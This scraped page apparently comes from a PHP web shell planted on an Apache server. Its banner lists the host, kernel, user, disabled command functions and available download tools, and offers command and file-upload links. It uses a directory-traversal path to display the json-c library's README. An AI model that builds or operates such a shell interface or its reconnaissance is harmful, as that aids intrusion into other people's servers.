Server IP : 192.168.23.10 / Your IP : 13.58.252.71 Web Server : Apache System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64 User : rrrallyteam ( 1049) PHP Version : 8.1.31 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /../bin/../share/icons/../dict/../themes/../doc/libgexiv2/../libfastjson/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>JSON-C - A JSON implementation in C</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <h2>JSON-C - A JSON implementation in C</h2> <h3>Overview</h3> <p>JSON-C implements a reference counting object model that allows you to easily construct JSON objects in C, output them as JSON formatted strings and parse JSON formatted strings back into the C representation of JSON objects.</p> <h3>Building</h3> <p>To setup JSON-C to build on your system please run <tt>configure</tt> and <tt>make</tt>.</p> <h3>Documentation</h3> <P>Doxygen generated documentation exists <a href="doc/html/json__object_8h.html">here</a>.</P> <h3><a href="https://github.com/json-c/json-c">GIT Reposository</a></h3> <p><strong><code>git clone https://github.com/json-c/json-c.git</code></strong></p> <h3><a href="http://groups.google.com/group/json-c">Mailing List</a></h3> <pi>Send email to <strong><code>json-c <i><at></i> googlegroups <i><dot></i> com</code></strong></p> <h3><a href="COPYING">License</a></h3> <p>This program is free software; you can redistribute it and/or modify it under the terms of the MIT License..</p> <hr/> </body> </html>